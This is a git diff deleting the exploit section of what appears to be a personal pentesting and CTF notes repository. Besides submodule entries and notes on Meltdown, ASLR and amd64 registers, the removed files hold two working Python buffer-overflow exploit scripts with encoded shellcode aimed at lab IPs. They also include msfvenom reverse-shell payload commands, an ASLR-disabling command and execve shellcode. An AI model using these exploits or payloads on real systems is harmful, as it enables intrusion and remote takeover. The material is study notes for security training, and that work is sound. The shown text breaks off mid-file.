diff --git a/.gitmodules b/.gitmodules
index d9903ac..e3facca 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -13,9 +13,6 @@
 [submodule "reverse_shells/One-Lin3r"]
 	path = reverse_shells/One-Lin3r
 	url = https://github.com/D4Vinci/One-Lin3r.git
-[submodule "exploit/web/php/Chankro"]
-	path = exploit/web/php/Chankro
-	url = https://github.com/TarlogicSecurity/Chankro.git
 [submodule "enumeration/enumeration"]
 	path = enumeration/enumeration
 	url = https://github.com/digininja/CeWL.git
@@ -34,9 +31,6 @@
 [submodule "enumeration/priv_esc/deepce"]
 	path = enumeration/priv_esc/deepce
 	url = https://github.com/stealthcopter/deepce.git
-[submodule "exploit/web/content_security_policy/JSONBee"]
-	path = exploit/web/content_security_policy/JSONBee
-	url = https://github.com/zigoo0/JSONBee.git
 [submodule "post_exploitation/firefox_decrypt"]
 	path = post_exploitation/firefox_decrypt
 	url = https://github.com/unode/firefox_decrypt.git
@@ -55,63 +49,30 @@
 [submodule "reverse_shells/phpreverseshell"]
 	path = reverse_shells/phpreverseshell
 	url = https://github.com/rootkral4/phpreverseshell.git
-[submodule "exploit/web/xxe/xxeserv"]
-	path = exploit/web/xxe/xxeserv
-	url = https://github.com/staaldraad/xxeserv.git
 [submodule "reverse_engineering/SCDBG"]
 	path = reverse_engineering/SCDBG
 	url = https://github.com/dzzie/SCDBG.git
 [submodule "reverse_engineering/java/deobfuscator"]
 	path = reverse_engineering/java/deobfuscator
 	url = https://github.com/java-deobfuscator/deobfuscator.git
-[submodule "exploit/windows/CrackMapExec"]
-	path = exploit/windows/CrackMapExec
-	url = https://github.com/byt3bl33d3r/CrackMapExec.git
 [submodule "telecommunications/sipvicious"]
 	path = telecommunications/sipvicious
 	url = https://github.com/EnableSecurity/sipvicious.git
 [submodule "exploit/windows/PrintNightmare"]
 	path = exploit/windows/PrintNightmare
 	url = https://github.com/ly4k/PrintNightmare.git
-[submodule "exploit/web/php/phpggc"]
-	path = exploit/web/php/phpggc
-	url = https://github.com/ambionics/phpggc.git
 [submodule "post_exploitation/priv_esc/sucrack"]
 	path = post_exploitation/priv_esc/sucrack
 	url = https://github.com/hemp3l/sucrack.git
-[submodule "exploit/java/JNDI-Exploit-Kit"]
-	path = exploit/java/JNDI-Exploit-Kit
-	url = https://github.com/pimps/JNDI-Exploit-Kit.git
-[submodule "exploit/binaries/buffer_overflow/ropstar"]
-	path = exploit/binaries/buffer_overflow/ropstar
-	url = https://github.com/xct/ropstar.git
-[submodule "exploit/java/log4j-scan"]
-	path = exploit/java/log4j-scan
-	url = https://github.com/fullhunt/log4j-scan.git
 [submodule "exploit/windows/printspoofer"]
 	path = exploit/windows/printspoofer
 	url = https://github.com/dievus/printspoofer.git
 [submodule "post_exploitation/powershell"]
 	path = post_exploitation/powershell
 	url = https://github.com/puckiestyle/powershell.git
-[submodule "exploit/macOS/ds_store_exp"]
-	path = exploit/macOS/ds_store_exp
-	url = https://github.com/lijiejie/ds_store_exp.git
-[submodule "exploit/macOS/DS_Store_crawler_parser"]
-	path = exploit/macOS/DS_Store_crawler_parser
-	url = https://github.com/anantshri/DS_Store_crawler_parser.git
-[submodule "exploit/macOS/Python-dsstore"]
-	path = exploit/macOS/Python-dsstore
-	url = https://github.com/gehaxelt/Python-dsstore.git
 [submodule "post_exploitation/armitage"]
 	path = post_exploitation/armitage
 	url = https://gitlab.com/kalilinux/packages/armitage.git
-[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
-	path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
-	url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
-[submodule "exploit/padding/PadBuster"]
-	path = exploit/padding/PadBuster
-	url = https://github.com/AonCyberLabs/PadBuster.git
 [submodule "post_exploitation/bc_security/Empire"]
 	path = post_exploitation/bc_security/Empire
 	url = https://github.com/BC-SECURITY/Empire.git
@@ -121,33 +82,6 @@
 [submodule "misc/bruteforce/patator"]
 	path = misc/bruteforce/patator
 	url = https://github.com/lanjelot/patator.git
-[submodule "exploit/samba/smbmap"]
-	path = exploit/samba/smbmap
-	url = https://github.com/ShawnDEvans/smbmap.git
-[submodule "exploit/web/beef"]
-	path = exploit/web/beef
-	url = https://github.com/beefproject/beef.git
-[submodule "exploit/web/jwt/jwt-cracker"]
-	path = exploit/web/jwt/jwt-cracker
-	url = https://github.com/lmammino/jwt-cracker.git
-[submodule "exploit/web/jwt/jwt_tool"]
-	path = exploit/web/jwt/jwt_tool
-	url = https://github.com/ticarpi/jwt_tool.git
-[submodule "exploit/web/ssti/tplmap"]
-	path = exploit/web/ssti/tplmap
-	url = https://github.com/epinna/tplmap.git
-[submodule "exploit/windows/impacket"]
-	path = exploit/windows/impacket
-	url = https://github.com/SecureAuthCorp/impacket.git
-[submodule "exploit/windows/windows-kernel-exploits"]
-	path = exploit/windows/windows-kernel-exploits
-	url = https://github.com/SecWiki/windows-kernel-exploits.git
-[submodule "exploit/PayloadsAllTheThings"]
-	path = exploit/PayloadsAllTheThings
-	url = https://github.com/swisskyrepo/PayloadsAllTheThings.git
-[submodule "exploit/GitTools"]
-	path = exploit/GitTools
-	url = https://github.com/internetwache/GitTools
 [submodule "misc/level3_hypervisor/docker_sec/dive"]
 	path = misc/level3_hypervisor/docker_sec/dive
 	url = https://github.com/wagoodman/dive.git
@@ -169,9 +103,3 @@
 [submodule "reverse_shells/windows/evil-winrm"]
 	path = reverse_shells/windows/evil-winrm
 	url = https://github.com/Hackplayers/evil-winrm.git
-[submodule "exploit/level3_hypervisor/docker_sec/dive"]
-	path = exploit/level3_hypervisor/docker_sec/dive
-	url = https://github.com/wagoodman/dive.git
-[submodule "exploit/level3_hypervisor/kubeletctl"]
-	path = exploit/level3_hypervisor/kubeletctl
-	url = https://github.com/cyberark/kubeletctl.git
diff --git a/exploit/CPUs/meltdown.md b/exploit/CPUs/meltdown.md
deleted file mode 100644
index 931630c..0000000
--- a/exploit/CPUs/meltdown.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Meltdown
-
-* [PoC from IAIK](https://github.com/IAIK/meltdown.git)
-![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown")
-
-* Each page table entries has the following flag values
-    * SUP (user or kernel mode)
-    * READ
-    * WRITE
-
-* Flags are checked by the MMU
-
-* Pipelined steps of an instruction are the following
-    * Fetch
-    * Decode
-    * Execute
-    * Memory access
-    * Register write back
-
-* A pipeline can execute one of each steps concurrently every clock cycle.
-* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls.
-* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline.
-    * If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end.
-
-* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown. 
-
diff --git a/exploit/GitTools b/exploit/GitTools
deleted file mode 160000
index 7cac63a..0000000
--- a/exploit/GitTools
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 7cac63a2c141cdf2ab0f854e790ace3f430304f4
diff --git a/exploit/PayloadsAllTheThings b/exploit/PayloadsAllTheThings
deleted file mode 160000
index 7fe0a04..0000000
--- a/exploit/PayloadsAllTheThings
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 7fe0a0475eebc544f0c469e7a89030c6b4fecf31
diff --git a/exploit/binaries/Shellcode.md b/exploit/binaries/Shellcode.md
deleted file mode 100644
index 312ff13..0000000
--- a/exploit/binaries/Shellcode.md
+++ /dev/null
@@ -1,107 +0,0 @@
-## Shellcode
-
-* [linux syscalls](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) Are used to craft the shellcode in assembly language
-* [asmtutor.com](https://asmtutor.com) to check the assembly
-
-## Staged and Unstaged Payloads
-
-* An unstaged payload is directly embedded in a binary and executes as is. This may be used to start malicious payload which does not need a remote connection or nearly none.
-* A small stub of the staged payload is embedded in the binary and should load additional instructions from remote which build the final reverse shell. The downloaded part will only reside in memory. The downloaded shellcode can be changed
-
-## Writing Shellcode Manually
-
-* Executing the shellcode relies on syscalls of the system
-
-* A 32 bit version looks like this
-```assembly
-SECTION .data
-msg     db      'Hello World!', 0Ah
- 
-SECTION .text
-global  _start
- 
-_start:
- 
-    mov     edx, 13
-    mov     ecx, msg
-    mov     ebx, 1
-    mov     eax, 4
-    int     80h
- 
-    mov     ebx, 0      ; return 0 status on exit - 'No Errors'
-    mov     eax, 1      ; invoke SYS_EXIT (kernel opcode 1)
-    int     80h
-```
-
-* A 64 bit version looks like this 
-```assembly
-global _start
-
-section .text
-_start:
-    jmp MESSAGE      
-
-OUTPUT:
-    mov rax, 0x1
-    mov rdi, 0x1
-    pop rsi          
-
-    mov rdx, 0xd
-    syscall
-
-    mov rax, 0x3c
-    mov rdi, 0x0
-    syscall
-
-MESSAGE:
-    call OUTPUT       
-    db "Hello, world!", 0dh, 0ah
-```
-
-### Compilation
-
-* Compile and link 32 bit
-```sh
-nasm -f elf helloworld.asm
-ld -m elf_i386 helloworld.o -o helloworld
-```
-
-* Compile and link 64 bit
-```sh
-nasm -f elf64 helloworld.asm
-ld helloworld.o -o helloworld
-```
-
-### Dump the binary
-
-* Dump the binary with `objdump -d helloworld` and take a look at the text section
-* Dump the text section into a file via
-```sh
-objcopy -j .text -O binary helloworld helloworld.text
-```
-
-### Format the Shellcode
-
-* Format and test the code by dumping it into a c file
-```
-xxd -i helloworld.text > helloworld.c
-sed -i '1s/^/#include<stdio.h>\n\n/' helloworld.c
-echo -e "\n\t(*(void(*)())helloworld_text)();\n\treturn 0;\n}" >> helloworld.c
-```
-
-* Compile the c file with an exectuable stack
-```sh
-gcc -z execstack -g -o helloworld helloworld.c
-```
-
-## Automated Shellcode Generation
-
-* Automate the creation via msfvenom
-* Staged payloads look like this
-```sh
-msfvenom -p linux/x64/meterpreter/reverse_tcp
-```
-* Stageless payloads look like this
-```sh
-msfvenom -p linux/x64/meterpreter/reverse_tcp
-```
diff --git a/exploit/binaries/aslr.md b/exploit/binaries/aslr.md
deleted file mode 100644
index 5dbc86e..0000000
--- a/exploit/binaries/aslr.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# ASLR
-
-## System Status
-
-* `0`, No randomization
-* `1`, Conservative, `*.so`, stack, `mmap`, VDSO and heap 
-* `2`, full randomization
-
-## Disable
-
-```sh
-echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
-```
-
-
diff --git a/exploit/binaries/buffer_overflow/bad_chars.py b/exploit/binaries/buffer_overflow/bad_chars.py
deleted file mode 100755
index a56d1a5..0000000
--- a/exploit/binaries/buffer_overflow/bad_chars.py
+++ /dev/null
@@ -1,8 +0,0 @@
-#!/usr/bin/env python3
-
-from __future__ import print_function
-listRem = "\\x0a".split("\\x")
-for x in range(1, 256):
-    if "{:02x}".format(x) not in listRem:
-        print("\\x" + "{:02x}".format(x), end='')
-print()
diff --git a/exploit/binaries/buffer_overflow/brainstorm.py b/exploit/binaries/buffer_overflow/brainstorm.py
deleted file mode 100644
index a7eaf98..0000000
--- a/exploit/binaries/buffer_overflow/brainstorm.py
+++ /dev/null
@@ -1,65 +0,0 @@
-import sys
-import socket
-
-badchars = bytearray()
-listRem = [0x00]
-for x in range(1, 256):
-    if x not in listRem:
-        badchars.append(x)
-
-buf =  b""
-buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
-buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
-buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
-buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
-buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
-buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
-buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
-buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
-buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
-buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
-buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
-buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
-buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
-buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
-buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
-buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
-buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
-buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
-buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
-buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
-buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
-buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
-buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
-buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
-buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
-buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
-buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
-
-
-ip = "10.10.143.77"
-port = 9999
-
-
-offset = 2012
-overflow = b"A" * offset
-retn = b"\xdf\x14\x50\x62" #"BBBB"
-padding = b"\x90" * 16
-payload = buf
-postfix = b""
-
-
-buffer = overflow + retn + padding + payload + postfix
-
-try:
-    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-    s.connect((ip, port))
-    s.recv(2000)
-    s.send(b"pwnbot")
-    s.recv(2000)
-    print("Sending evil buffer...")
-    s.send(buffer)
-    print("Done!")
-    s.close()
-except socket.error:
-    print("Could not connect: "+socket.error)
diff --git a/exploit/binaries/buffer_overflow/buffer_overflow.py b/exploit/binaries/buffer_overflow/buffer_overflow.py
deleted file mode 100755
index c8e7c21..0000000
--- a/exploit/binaries/buffer_overflow/buffer_overflow.py
+++ /dev/null
@@ -1,54 +0,0 @@
-#!/usr/bin/env python3
-
-import socket
-
-ip = "10.10.122.155"
-port = 31337
-
-prefix = ""
-offset = 146 
-overflow = "A" * offset
-# EIP return
-#retn = "BBBB"
-retn = "\xc3\x14\x04\x08"
-padding = "\x90" * 16
-#padding = ""
-#payload = ""
-payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
-payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4"
-payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1"
-payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44"
-payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b"
-payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5"
-payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c"
-payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb"
-payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc"
-payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b"
-payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a"
-payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66"
-payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a"
-payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34"
-payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97"
-payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a"
-payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45"
-payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93"
-payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66"
-payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29"
-payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3"
-payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb"
-payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89"
-payload += "\xef\xd9\x08\x3d\x0f\xc8";
-
-#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
-postfix = ""
-buffer = prefix + overflow + retn + padding + payload + postfix
-
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-try:
-    s.connect((ip, port))
-    print("[*] Sending buffer...")
-    s.send(bytes(buffer + "\r\n", "latin-1"))
-    print("Done!")
-except:
-    print("Could not connect")
diff --git a/exploit/binaries/buffer_overflow/docs/amd64.md b/exploit/binaries/buffer_overflow/docs/amd64.md
deleted file mode 100644
index de18ef8..0000000
--- a/exploit/binaries/buffer_overflow/docs/amd64.md
+++ /dev/null
@@ -1,56 +0,0 @@
-# amd64
-
-* `rax` return value, caller saved.
-* `rbx` base register (used for mem basepointer)
-* `rcx` counter register
-* `r10`, `r11` are caller saved.
-* `rbx`, `r12`, `r13`, `r14` are callee saved 
-* `rdx` data register
-* `rbp` is also callee saved(and can be optionally used as a frame pointer)
-* `rsp` is callee saved
-* `rip` next instruction pointer
-
-## Function argument registers
-* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved.
-* Further function args are stored inside its stack frame.
-
-
-## Overwriting Variables and Padding
-* Overwrite an atomic variable behind a buffer
-```C
-int main ( int argc, char ** argv ) {
-    int var = 0 
-    char buffer[12];
-    
-    gets(buffer);
-    [...]
-}
-```
-* Stack layout 
-```
-Bottom 
-+------------------+
-| Saved registers  |
-+------------------+
-| int var          |
-+------------------+
-| char buffer [11] |
-| ...              |
-| ...              |
-| ...              |
-| char buffer [0]  |
-+------------------+
-| char ** argv     |
-+------------------+
-| char argc        |
-+------------------+
-Top
-```
-
-* Watch out! I.e., a 12 byte array is padded to system memory allocation size.
-```
-+-------------+----+
-|12 byte array| 4b |
-+-------------+----+
-0            12   16 byte
-```
diff --git a/exploit/binaries/buffer_overflow/docs/amd64_instructions.md b/exploit/binaries/buffer_overflow/docs/amd64_instructions.md
deleted file mode 100644
index 9b37210..0000000
--- a/exploit/binaries/buffer_overflow/docs/amd64_instructions.md
+++ /dev/null
@@ -1,77 +0,0 @@
-# amd64 instructions
-
-* `;` starts a comment
-
-## Values
-* __Immediate__, numbers
-* __register__, existing registers
-* __memory__, memory addresses
-
-## Move
-* `MOV`, from source to destination
-* `LEA`, loads memory address and stores it in the destination. Address can have an offset. Does not dereference `[var]` or `[var+x]`
-* `PUSH` & `POP`, put & delete registers to/from stack.
-
-## Arithmetic
-* `INC`, increment
-* `DEC`, decrement
-* `ADD`
-* `SUB`, substracts source from dest and stores in dest
-* `MUL` & `IMUL`, result may be stored in upper and lower halfs (rdx:rax)
-* `DIV` & `IDIV`, rax is divided by rbx and may be stored in two halfs as well
-
-## Conditionals
-* `RET`, return value to the caller
-* `CMP`, compare two values and sets flag. Next instruction is a jump condition to a line number. Works as follows
-    * `JE`, `JEZ`, `JLE` ... followed by linenumber
-* `NOP`, `\x90`
-* `CALL` a function
-
-## Address Handling
-* `[var]`, memory address of var.
-    * If var contains an address then after `mov [var], 42` var points to the value 42. `[` dereference.
-  
-## Zero Handling in Registers
-* Move to `eax` will result in zeroing the upper 32 bit of an `rax` register, move to `ax`, `ah`, `al` will not.
-* `MOVZX` zeros anything but the value moved to the register inside of it.
-
-## Jumps
-* For signed value comparison
-    * `JL/JNGE` (SF <> OF) ; Jump if less/not greater or equal
-    * `JGE/JNL` (SF = OF) ; Jump if greater or equal/not less
-    * `JLE/JNG` (ZF = 1 or SF <> OF); Jump if less or equal/not greater
-    * `JG/JNLE` (ZF = 0 and SF = OF); Jump if greater/not less or equal
-
-* For unsigned value comparison
-    * `JB/JNAE` (CF = 1) ; Jump if below/not above or equal
-    * `JAE/JNB` (CF = 0) ; Jump if above or equal/not below
-    * `JBE/JNA` (CF = 1 or ZF = 1) ; Jump if below or equal/not above
-    * `JA/JNBE` (CF = 0 and ZF = 0); Jump if above/not below or equal
-
-## Flags
-* `eflags` 32bit
-* `rflags` 64bit
-
-### Status
-* __Zero Flag__ (ZF), 1 if the result of the comparison is equal.
-* __Carry Flag__ (CF), a 1 is stored if a carry is needed after a calculation.
-* __Overflow Flag__ (OF), register overflow is 1
-* __Sign Flag__ (SF), 1 if result is negative.
-* __Adjust/Auxiliary Flag__ (AF), carry flag for BCD.
-* __Parity Flag__ (PF), 1 if the last 8 bits are even.
-* __Trap Flag__ (TF)
-
-## Calling Conventions 
-
-## cdecl
-
-## fastcall
-* First four are passed __left to right__
-* int -> RCX, RDX, R8, R9
-* float -> XMM0, XMM1, XMM2, XMM3
-* Rest is __right to left__
-* Basepointer is saved by the caller
-* Return values is passes via `rax` or `xmm0`
-* Caller allocates space for at least four values, so 32 bytes are reserved. `$rsp to $rsp+0x18`
-* Volatile registers are `rax, rcx, r8, r9, r10, r11, xmm0, xmm1, xmm2, xmm3, xmm4, xmm5`. These are destroyed after function call.
-* Nonvolatile registers are `rbx, rbp, rdi, rsi, rsp, r12, r13, r14, r15, xmm6-15` ares saved and restored after function call.
diff --git a/exploit/binaries/buffer_overflow/docs/buffer_overflow.md b/exploit/binaries/buffer_overflow/docs/buffer_overflow.md
deleted file mode 100644
index c08e81c..0000000
--- a/exploit/binaries/buffer_overflow/docs/buffer_overflow.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# Buffer Overflow
-* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
-
-# Usage
-* Fuzz & crash the binary pretty roughly via payload 
-```sh
-python -c "print('A' * 3000)
-```
-
-## Fuzzing 
-* python 3
-../fuzzer.py
-
-* python 2
-../fuzzer2.py
-
-## Measure Offset
-* Use as payload
-```sh
-/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
-```
-* Find content of the payload at EIP and identify exact bufferlength
-```sh
-/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
-```
-```
-msf-pattern_offset -l <bufferlength> -q <EIP>
-```
-```
-mona msfpattern -l <bufferlength>
-```
-* Fill offset variable in exploit `buffer_overflow.py`
-../buffer_overflow.py
-
-* Execute buffer_overflow.py, EIP should contain `BBBB`
-
-## Find bad characters to input in the buffer
-* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
-../bad_chars.py
-
-* Compare stack if any bad chars block exectuion of the payload following in the next steps.
-```sh
-!mona bytearray -b "\x00"
-!mona compare -f <path_to_bytearray.bin> -a <ESP>
-```
-
-## Find Jump Point / RoP 
-* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
-
-### Example: Immunity Debugger using mona on windows machine
-```sh
-!mona modules
-```
-```sh
-!mona jmp -r esp -m <exploitable_bin_from_modules>
-```
-* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
-
-## Shellcode as Payload
-* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
-```sh
-msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
-msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
-```  
-* Prepend NOPs as padding before shellcode
-
diff --git a/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md b/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md
deleted file mode 100644
index 3255b7d..0000000
--- a/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Cut Stack in Half + NOPsled
-
-* Stack has to be executable
-* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
-* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard
-
-## shellcraft
-* for example
-```sh
-shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
-```
-
-##  Usage
-* measure `eip` offset via 
-    ```sh
-    cyclic <number>
-    ```
-    * Check eip content via gdb
-    ```sh
-    cyclic -l <eipContent>
-    ```
-* Example code
-```python
-from pwn import *
-
-padding(cyclic(cyclic_find(<eipContent>))
-eip = p32(<esp> + some offset into stack)
-sled = 90 * 100
-shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
-payload = padding + eip + sled + shellcode
-```
-
diff --git a/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md b/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md
deleted file mode 100644
index 14bafbb..0000000
--- a/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# pwntools
-
-## Memory Addresses of ELF Binary
-* Find address of function and use it on $eip
-```python
-p = process(<binary>)
-elf = ELF(<binary>)
-__function = elf.symbol.<functionName>
-payload = fit({
-    42: __function # Length measured via cyclic 
-})
-p.sendline()
-proc.interactive() 
-```
-
diff --git a/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md b/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md
deleted file mode 100644
index 5953ef1..0000000
--- a/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md
+++ /dev/null
@@ -1,121 +0,0 @@
-# Return Address reuse
-
-## via Shellcode, an examples
-* Find out the address of the start of the buffer and the start address of the return address
-* Calculate the difference between these addresses so you know how much data to enter to overflow
-* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
-
-* Plus NOPsled (sometimes xargs is needed in front of the app call)
-```python
